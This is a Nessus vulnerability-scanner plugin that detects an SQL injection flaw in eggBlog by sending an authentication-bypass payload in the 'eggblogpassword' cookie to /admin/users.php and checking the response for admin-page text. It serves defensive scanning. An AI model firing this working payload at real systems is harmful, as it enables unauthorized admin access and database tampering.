#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(29927);
  script_version("$Revision: 1.2 $");

  script_cve_id("CVE-2008-0159");
  script_bugtraq_id(27168);
  script_xref(name:"OSVDB", value:"40209");

  script_name(english:"eggBlog eggblogpassword Parameter SQL Injection Vulnerability");
  script_summary(english:"Tries to bypass authentication using SQL injection");

  desc = "
Synopsis :

The remote web server contains a PHP application that is prone to a
SQL injection attack. 

Description :

The remote host is running eggBlog, a free PHP and MySQL blog software
package. 

The version of eggBlog installed on the remote host fails to sanitize
input to the 'eggblogpassword' cookie before using it in
'_etc/header.php' to construct database queries.  Provided PHP's
'magic_quotes_gpc' setting is disabled, an attacker may be able to
exploit this issue to manipulate database queries to disclose
sensitive information, bypass authentication, modify data, or even
attack the underlying database. 

See also :

http://www.milw0rm.com/exploits/4860

Solution :

Unknown at this time.

Risk factor :

Medium / CVSS Base Score : 6.8
(CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/eggblog", "/blog", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Try to exploit the issue to bypass authentication.
  exploit = "eggblogemail=%;eggblogpassword=' or 1=0 UNION SELECT 2/*";

  req = http_get(item:string(dir, "/admin/users.php"), port:port);
  req = str_replace(
    string:req,
    find:"User-Agent:",
    replace:string(
      "Cookie: ", exploit, "\r\n",
      "User-Agent:"
    )
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we're logged in.
  if (
    ">powered by eggblog" >< res &&
    (
      "The following users are registered" >< res ||
      '<a href="users.php?delete=' >< res ||
      "The following IP's are currently banned" >< res
    )
  )
  {
    security_warning(port);
    exit(0);
  }
}
